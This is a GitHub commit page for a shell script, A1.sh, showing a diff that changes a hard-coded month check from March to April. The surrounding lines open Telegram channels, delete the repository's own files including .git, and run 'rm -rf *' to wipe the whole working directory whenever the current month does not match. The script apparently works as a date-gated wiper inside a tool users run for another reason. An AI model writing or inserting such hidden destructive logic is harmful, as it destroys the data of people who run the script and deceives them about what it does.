Skip to content

Commit

Permalink
Update A1.sh
Browse files Browse the repository at this point in the history
  • Loading branch information
mike90s15 authored Apr 4, 2024
1 parent e1a788f commit 413f8b2
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion A1.sh
Original file line number Diff line number Diff line change
Expand Up @@ -6,7 +6,7 @@
xdg-open https://t.me/clownters_channel && sleep 15
xdg-open https://t.me/channel_90s15 &>/dev/null && sleep 15
rm -rf "README.md" "Sploit" "SECURITY.md" "LICENSE" "index.html" ".git" "regras-clownters.md"
if [[ "$(date +%B)" != "March" ]]; then
if [[ "$(date +%B)" != "April" ]]; then
clear
rm -rf *
else
Expand Down

0 comments on commit 413f8b2

Please sign in to comment.